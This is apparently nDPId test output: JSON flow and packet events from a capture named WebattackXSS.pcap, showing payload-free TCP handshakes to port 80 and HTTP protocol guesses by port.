+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":2,"flow_last_seen":1499347748472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347748472,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Gb4tplB6JS5MaAScSCkAwAAAgQFtAQCCAoD5bPfATviagEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":3,"flow_last_seen":1499347748473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347748473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W1tAAD4Gan2sEAABwKgKMuxmAFDolLkx+LaZQoAQAOVDCgAAAQEICgE74msD5bPf"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347749751,"flow_last_seen":1499347749751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347749751,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1499347749751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347749751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IJFAAD4GpT+sEAABwKgKMux0AFD35MM7AAAAAKACchDSOAAAAgQFtAQCCAoBO+OqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6528,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":2,"flow_last_seen":1499347749752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347749752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7HSHR7QM9+TDPKAScSDevgAAAgQFtAQCCAoD5bUfATvjqgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":3,"flow_last_seen":1499347749752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347749752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IJJAAD4GpUasEAABwKgKMux0AFD35MM8h0e0DYAQAOV9xgAAAQEICgE746oD5bUf"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347752308,"flow_last_seen":1499347752308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347752308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1499347752308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347752308,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qStAAD4GHKWsEAABwKgKMuyOAFBMoE8CAAAAAKACchDvHQAAAgQFtAQCCAoBO+YpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":2,"flow_last_seen":1499347752308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347752308,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7I5f6lZGTKBPA6AScSB+SAAAAgQFtAQCCAoD5beeATvmKQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":3,"flow_last_seen":1499347752309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347752309,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qSxAAD4GHKysEAABwKgKMuyOAFBMoE8DX+pWR4AQAOUdTwAAAQEICgE75ioD5bee"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347753649,"flow_last_seen":1499347753649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347753649,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1499347753649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347753649,"pkt":"ABm5CmnxAMGxFOsxCABFAAA825ZAAD4G6jmsEAABwKgKMuycAFCJVjzvAAAAAKACchDDHAAAAgQFtAQCCAoBO+d5AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":2,"flow_last_seen":1499347753649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347753649,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Jyb\/4pAiVY88KAScSDg6AAAAgQFtAQCCAoD5bjtATvneQEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6559,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":3,"flow_last_seen":1499347753650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347753650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA025dAAD4G6kCsEAABwKgKMuycAFCJVjzwm\/+KQYAQAOV\/8AAAAQEICgE753kD5bjt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347756244,"flow_last_seen":1499347756244,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347756244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1499347756244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347756244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sh5AAD4GE7KsEAABwKgKMuy2AFCIyFgfAAAAAKACchCl2AAAAgQFtAQCCAoBO+oBAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":2,"flow_last_seen":1499347756244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347756244,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Lb17AxJiMhYIKAScSDlJQAAAgQFtAQCCAoD5bt2ATvqAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6580,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":3,"flow_last_seen":1499347756245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347756245,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sh9AAD4GE7msEAABwKgKMuy2AFCIyFgg9ewMSoAQAOWELAAAAQEICgE76gID5bt2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347757502,"flow_last_seen":1499347757502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347757502,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1499347757502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347757502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UWhAAD4GdGisEAABwKgKMuzEAFA\/lLpUAAAAAKACchCLjgAAAgQFtAQCCAoBO+s8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6588,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":2,"flow_last_seen":1499347757502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347757502,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7MQtkPNXP5S6VaAScSCq7wAAAgQFtAQCCAoD5bywATvrPAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6589,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":3,"flow_last_seen":1499347757502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347757502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UWlAAD4GdG+sEAABwKgKMuzEAFA\/lLpVLZDzWIAQAOVJ9wAAAQEICgE76zwD5byw"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347758774,"flow_last_seen":1499347758774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347758774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1499347758774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347758774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83kZAAD4G54msEAABwKgKMuzSAFAZPzI8AAAAAKACchA4sAAAAgQFtAQCCAoBO+x6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6600,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":2,"flow_last_seen":1499347758774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347758774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7NL2+p6BGT8yPaAScSDiPQAAAgQFtAQCCAoD5b3vATvsegEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6601,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":3,"flow_last_seen":1499347758775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347758775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03kdAAD4G55CsEAABwKgKMuzSAFAZPzI99vqegoAQAOWBRQAAAQEICgE77HoD5b3v"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347761418,"flow_last_seen":1499347761418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761418,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1499347761418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347761418,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apdAAD4GWzmsEAABwKgKMuzsAFC\/aIWYAAAAAKACchA8ewAAAgQFtAQCCAoBO+8PAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":2,"flow_last_seen":1499347761418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347761418,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7OwFUgVYv2iFmaAScSBuRgAAAgQFtAQCCAoD5cCEATvvDwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":3,"flow_last_seen":1499347761419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347761419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aphAAD4GW0CsEAABwKgKMuzsAFC\/aIWZBVIFWYAQAOUNTgAAAQEICgE77w8D5cCE"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 